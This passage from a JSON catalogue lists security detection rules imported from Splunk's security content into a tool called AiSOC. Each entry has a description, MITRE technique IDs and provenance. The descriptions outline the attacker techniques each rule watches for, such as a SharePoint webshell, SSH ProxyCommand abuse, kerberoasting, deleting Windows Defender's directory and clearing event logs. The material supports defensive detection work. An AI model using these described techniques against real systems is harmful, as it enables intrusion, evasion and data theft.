target system, and any subsequent network or system activity, as routine administrative tasks may also trigger this behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-execution-of-microsoft-msc-file-in-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac30858b-7c25-4f0a-a7fa-bef036e49dc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_execution_of_microsoft_msc_file_in_suspicious_path.yml" } }, { "id": "splunk-security-content-ac3311f5-661d-4e99-bd1f-3ec665b05441", "type": "detection", "name": "Windows Mail Protocol In Non-Common Process Path", "description": "The following analytic detects a Windows application establishing an SMTP connection from a non-common installation path. It leverages Sysmon EventCode 3 to identify processes not typically associated with email clients (e.g., Thunderbird, Outlook) making SMTP connections. This activity is significant as adversaries, including malware like AgentTesla, use such connections for Command and Control (C2) communication to exfiltrate stolen data. If confirmed malicious, this behavior could lead to unauthorized data exfiltration, including sensitive information like desktop screenshots, browser data, and system details, compromising the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mail-protocol-in-non-common-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac3311f5-661d-4e99-bd1f-3ec665b05441", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mail_protocol_in_non_common_process_path.yml" } }, { "id": "splunk-security-content-ac3b81c0-52f4-11ec-ac44-acde48001122", "type": "detection", "name": "Unusual Number of Computer Service Tickets Requested", "description": "The following analytic identifies an unusual number of computer service ticket requests from a single source, leveraging Event ID 4769, \"A Kerberos service ticket was requested.\" It uses statistical analysis, including standard deviation and the 3-sigma rule, to detect anomalies in service ticket requests. This activity is significant as it may indicate malicious behavior such as lateral movement, malware staging, or reconnaissance. If confirmed malicious, an attacker could gain unauthorized access to multiple endpoints, facilitating further compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-computer-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac3b81c0-52f4-11ec-ac44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_computer_service_tickets_requested.yml" } }, { "id": "splunk-security-content-ac490de2-ee39-421c-b61b-1c4005dde427", "type": "detection", "name": "Windows SharePoint Spinstall0 GET Request", "description": "The following analytic detects potential post-exploitation activity related to the Microsoft SharePoint CVE-2025-53770 vulnerability. After successful exploitation via the ToolPane.aspx endpoint, attackers typically deploy a webshell named \"spinstall0.aspx\" in the SharePoint layouts directory. This detection identifies GET requests to this webshell, which indicates active use of the backdoor for command execution, data exfiltration, or credential/key extraction. Attackers commonly use these webshells to extract encryption keys, authentication tokens, and other sensitive information from the compromised SharePoint server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-spinstall0-get-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac490de2-ee39-421c-b61b-1c4005dde427", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_sharepoint_spinstall0_get_request.yml" } }, { "id": "splunk-security-content-ac520039-21f1-4567-b528-5b7133dba76f", "type": "detection", "name": "Windows SSH Proxy Command", "description": "This detection identifies potential abuse of SSH \"ProxyCommand\" or \"LocalCommand\" by monitoring for suspicious process execution patterns.\nSpecifically, it looks for instances where ssh.exe (as a parent process) containing \"ProxyCommand\" or \"LocalCommand\" in its arguments spawns potentially malicious child processes like mshta, powershell, wscript, or cscript, or processes containing \"http\" in their command line.\nThis technique can be used by attackers to execute arbitrary commands through SSH proxy configurations, potentially enabling command & control activities or remote code execution. The detection focuses on commonly abused Windows scripting engines and web requests that may indicate malicious activity when spawned through SSH proxy commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ssh-proxy-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac520039-21f1-4567-b528-5b7133dba76f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ssh_proxy_command.yml" } }, { "id": "splunk-security-content-ac54d39e-a75d-4f42-971d-006db3a0423a", "type": "detection", "name": "Cisco Secure Firewall - Remote Access Software Usage Traffic", "description": "The following analytic detects network traffic associated with known remote access software applications\nthat are covered by Cisco Secure Firewall Application Detectors, such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nIt leverages Cisco Secure Firewall Threat Defense Connection Event.\nThis activity is significant because adversaries often use remote access tools to maintain unauthorized access to compromised environments.\nIf confirmed malicious, this activity could allow attackers to control systems remotely, exfiltrate\ndata, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-remote-access-software-usage-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac54d39e-a75d-4f42-971d-006db3a0423a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___remote_access_software_usage_traffic.yml" } }, { "id": "splunk-security-content-ac59298a-8d81-4c02-8c9b-ffdac993891f", "type": "detection", "name": "Windows Modify Registry ValleyRAT C2 Config", "description": "The following analytic detects modifications to theregistry related to ValleyRAT C2 configuration. Specifically, it monitors changes in registry keys where ValleyRAT saves the IP address and port information of its command-and-control (C2) server. This activity is a key indicator of ValleyRAT attempting to establish persistent communication with its C2 infrastructure. By identifying these unauthorized registry modifications, security analysts can quickly detect malicious configurations and investigate the associated threats. Early detection of these changes helps prevent further exploitation and limits the malware\u2019s ability to exfiltrate data or control infected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-valleyrat-c2-config.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac59298a-8d81-4c02-8c9b-ffdac993891f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_valleyrat_c2_config.yml" } }, { "id": "splunk-security-content-ac7c4d0a-06a3-4278-aa59-88a5e537f981", "type": "detection", "name": "O365 New Email Forwarding Rule Enabled", "description": "The following analytic identifies the creation of new email forwarding rules in an Office 365 environment via the UpdateInboxRules operation. It leverages Office 365 management activity events to detect rules that forward emails to external recipients by examining the OperationProperties for specific forwarding actions. This activity is significant as it may indicate unauthorized email redirection, potentially leading to data exfiltration. If confirmed malicious, attackers could intercept sensitive communications, leading to data breaches and information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-email-forwarding-rule-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac7c4d0a-06a3-4278-aa59-88a5e537f981", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_email_forwarding_rule_enabled.yml" } }, { "id": "splunk-security-content-ac90b339-13fc-4f29-a18c-4abbba1f2171", "type": "detection", "name": "AWS Exfiltration via EC2 Snapshot", "description": "The following analytic detects a series of AWS API calls related to EC2 snapshots within a short time window, indicating potential exfiltration via EC2 Snapshot modifications. It leverages AWS CloudTrail logs to identify actions such as creating, describing, and modifying snapshot attributes. This activity is significant as it may indicate an attacker attempting to exfiltrate data by sharing EC2 snapshots externally. If confirmed malicious, the attacker could gain access to sensitive information stored in the snapshots, leading to data breaches and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-ec2-snapshot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac90b339-13fc-4f29-a18c-4abbba1f2171", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_ec2_snapshot.yml" } }, { "id": "splunk-security-content-acb3ea33-70f7-47aa-b335-643b3aebcb2f", "type": "detection", "name": "Linux Auditd Possible Access Or Modification Of Sshd Config File", "description": "The following analytic detects access, deletion or modification of the ssh_config file on Linux systems.\nIt leverages data from Linux Auditd, focusing on events of type PATH with a nametype of (\"NORMAL\", \"CREATE\", \"DELETE\").\nThis activity could be significant because unauthorized changes to ssh_config can allow threat actors to redirect port connections or use unauthorized keys, potentially compromising the system.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent backdoor access, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-or-modification-of-sshd-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "acb3ea33-70f7-47aa-b335-643b3aebcb2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_or_modification_of_sshd_config_file.yml" } }, { "id": "splunk-security-content-acb5dc74-5324-11ec-a36d-acde48001122", "type": "detection", "name": "Unusual Number of Remote Endpoint Authentication Events", "description": "The following analytic identifies an unusual number of remote authentication attempts from a single source by leveraging Windows Event ID 4624, which logs successful account logons. It uses statistical analysis, specifically the 3-sigma rule, to detect deviations from normal behavior. This activity is significant for a SOC as it may indicate lateral movement, malware staging, or reconnaissance. If confirmed malicious, this behavior could allow an attacker to move laterally within the network, escalate privileges, or gather information for further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-remote-endpoint-authentication-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "acb5dc74-5324-11ec-a36d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_remote_endpoint_authentication_events.yml" } }, { "id": "splunk-security-content-accb0712-c381-11eb-8e5b-acde48001122", "type": "detection", "name": "Modification Of Wallpaper", "description": "The following analytic detects the modification of registry keys related to the desktop wallpaper settings. It leverages Sysmon EventCode 13 to identify changes to the \"Control Panel\\\\Desktop\\\\Wallpaper\" and \"Control Panel\\\\Desktop\\\\WallpaperStyle\" registry keys, especially when the modifying process is not explorer.exe or involves suspicious file paths like temp or public directories. This activity is significant as it can indicate ransomware behavior, such as the REVIL ransomware, which changes the wallpaper to display a ransom note. If confirmed malicious, this could signify a compromised machine and the presence of ransomware, leading to potential data encryption and extortion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1491" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/modification-of-wallpaper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "accb0712-c381-11eb-8e5b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/modification_of_wallpaper.yml" } }, { "id": "splunk-security-content-ad03bfcf-8a91-4bc2-a500-112993deba87", "type": "detection", "name": "System User Discovery With Query", "description": "The following analytic detects the execution of `query.exe` with command-line arguments aimed at discovering logged-in users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use `query.exe` to gain situational awareness and perform Active Directory discovery on compromised endpoints. If confirmed malicious, this behavior could allow attackers to identify active users, aiding in further lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-user-discovery-with-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad03bfcf-8a91-4bc2-a500-112993deba87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_user_discovery_with_query.yml" } }, { "id": "splunk-security-content-ad05aae6-3b2a-4f73-af97-57bd26cee3b9", "type": "detection", "name": "WMI Permanent Event Subscription - Sysmon", "description": "The following analytic identifies the creation of WMI permanent event subscriptions, which can be used to establish persistence or perform privilege escalation. It leverages Sysmon data, specifically EventCodes 19, 20, and 21, to detect the creation of WMI EventFilters, EventConsumers, and FilterToConsumerBindings. This activity is significant as it may indicate an attacker setting up mechanisms to execute code with elevated SYSTEM privileges when specific events occur. If confirmed malicious, this could allow the attacker to maintain persistence, escalate privileges, and execute arbitrary code, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-permanent-event-subscription-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad05aae6-3b2a-4f73-af97-57bd26cee3b9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_permanent_event_subscription___sysmon.yml" } }, { "id": "splunk-security-content-ad3f352a-0347-48ee-86b9-670b5025a548", "type": "detection", "name": "Ollama Possible API Endpoint Scan Reconnaissance", "description": "Detects API reconnaissance and endpoint scanning activity against Ollama servers by identifying sources probing multiple API endpoints within short timeframes, particularly when using HEAD requests or accessing diverse endpoint paths, which indicates systematic enumeration to map the API surface, discover hidden endpoints, or identify vulnerabilities before launching targeted attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-api-endpoint-scan-reconnaissance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad3f352a-0347-48ee-86b9-670b5025a548", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_api_endpoint_scan_reconnaissance.yml" } }, { "id": "splunk-security-content-ad517544-aff9-4c96-bd99-d6eb43bfbb6a", "type": "detection", "name": "Windows Event Log Cleared", "description": "The following analytic detects the clearing of Windows event logs by identifying Windows Security Event ID 1102 or System log event 104. This detection leverages Windows event logs to monitor for log clearing activities. Such behavior is significant as it may indicate an attempt to cover tracks after malicious activities. If confirmed malicious, this action could hinder forensic investigations and allow attackers to persist undetected, making it crucial to investigate further and correlate with other alerts and data sources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-log-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad517544-aff9-4c96-bd99-d6eb43bfbb6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_log_cleared.yml" } }, { "id": "splunk-security-content-ad5ac21b-3b1e-492c-8e19-ea5d5e8e5cf1", "type": "detection", "name": "Linux Persistence and Privilege Escalation Risk Behavior", "description": "The following analytic identifies potential Linux persistence and privilege escalation activities. It leverages risk scores and event counts from various Linux-related data sources, focusing on tactics associated with persistence and privilege escalation. This activity is significant for a SOC because it highlights behaviors that could allow an attacker to maintain access or gain elevated privileges on a Linux system. If confirmed malicious, this activity could enable an attacker to execute code with higher privileges, persist in the environment, and potentially access sensitive information, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-persistence-and-privilege-escalation-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad5ac21b-3b1e-492c-8e19-ea5d5e8e5cf1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_persistence_and_privilege_escalation_risk_behavior.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6bd71", "type": "detection", "name": "Common Ransomware Notes", "description": "The following analytic detects the creation of files with names commonly associated with ransomware notes.\nIt leverages file-system activity data from the Endpoint Filesystem data model, typically populated by endpoint detection and response (EDR) tools or Sysmon logs.\nThis activity is significant because ransomware notes indicate a potential ransomware attack, which can lead to data encryption and extortion.\nIf confirmed malicious, this activity could result in significant data loss, operational disruption, and financial impact due to ransom demands.\nNote that this analytic relies on a lookup table (ransomware_notes_lookup) that contains known ransomware note file names.\nEnsure that this lookup table is regularly updated to include new ransomware note file names as they are identified in the threat landscape.\nAlso this analytic leverages a sub-search to enhance performance. sub-searches have limitations on the amount of data they can return. Keep this in mind if you have an extensive list of ransomware note file names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/common-ransomware-notes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6bd71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/common_ransomware_notes.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6bd75", "type": "detection", "name": "AWS Network Access Control List Created with All Open Ports", "description": "The following analytic detects the creation of AWS Network Access Control Lists (ACLs) with all ports open to a specified CIDR. It leverages AWS CloudTrail events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry` actions with rules allowing all traffic. This activity is significant because it can expose the network to unauthorized access, increasing the risk of data breaches and other malicious activities. If confirmed malicious, an attacker could exploit this misconfiguration to gain unrestricted access to the network, potentially leading to data exfiltration, service disruption, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-network-access-control-list-created-with-all-open-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6bd75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6fd75", "type": "detection", "name": "AWS Network Access Control List Deleted", "description": "The following analytic detects the deletion of AWS Network Access Control Lists (ACLs). It leverages AWS CloudTrail logs to identify events where a user deletes a network ACL entry. This activity is significant because deleting a network ACL can remove critical access restrictions, potentially allowing unauthorized access to cloud instances. If confirmed malicious, this action could enable attackers to bypass network security controls, leading to unauthorized access, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-network-access-control-list-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6fd75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_network_access_control_list_deleted.yml" } }, { "id": "splunk-security-content-adbff89c-c1f2-4a2e-88a4-b5e645856510", "type": "detection", "name": "Windows Process With NetExec Command Line Parameters", "description": "The following analytic detects the use of NetExec (formally CrackmapExec) a toolset used for post-exploitation enumeration and attack within Active Directory environments through command line parameters. It leverages Endpoint Detection and Response (EDR) data to identify specific command-line arguments associated with actions like ticket manipulation, kerberoasting, and password spraying. This activity is significant as NetExec is used by adversaries to exploit Kerberos for privilege escalation and lateral movement. If confirmed malicious, this could lead to unauthorized access, persistence, and potential compromise of sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003", "T1558.003", "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-with-netexec-command-line-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "adbff89c-c1f2-4a2e-88a4-b5e645856510", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_with_netexec_command_line_parameters.yml" } }, { "id": "splunk-security-content-adf47620-79fa-11ec-b248-acde48001122", "type": "detection", "name": "Powershell Remove Windows Defender Directory", "description": "The following analytic detects a suspicious PowerShell command attempting to delete the Windows Defender directory. It leverages PowerShell Script Block Logging to identify commands containing \"rmdir\" and targeting the Windows Defender path. This activity is significant as it may indicate an attempt to disable or corrupt Windows Defender, a key security component. If confirmed malicious, this action could allow an attacker to bypass endpoint protection, facilitating further malicious activities without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remove-windows-defender-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "adf47620-79fa-11ec-b248-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remove_windows_defender_directory.yml" } }, { "id": "splunk-security-content-ae008c0f-83bd-4ed4-9350-98d4328e15d2", "type": "detection", "name": "Network Connection Discovery With Arp", "description": "The following analytic detects the execution of `arp.exe` with the `-a` flag, which is used to list network connections on a compromised system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and related telemetry. Monitoring this activity is significant because both Red Teams and adversaries use `arp.exe` for situational awareness and Active Directory discovery. If confirmed malicious, this activity could allow attackers to map the network, identify active devices, and plan further lateral movement or attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-connection-discovery-with-arp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae008c0f-83bd-4ed4-9350-98d4328e15d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_connection_discovery_with_arp.yml" } }, { "id": "splunk-security-content-ae286126-f2ad-421c-b240-4ea83bd1c43a", "type": "detection", "name": "Azure AD FullAccessAsApp Permission Assigned", "description": "The following analytic detects the assignment of the 'full_access_as_app' permission to an application within Office 365 Exchange Online. This is identified by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40' and the ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. The detection leverages the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This activity is significant as it grants broad control over Office 365 operations, including full access to all mailboxes and the ability to send emails as any user. If malicious, this could lead to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002", "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-fullaccessasapp-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae286126-f2ad-421c-b240-4ea83bd1c43a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 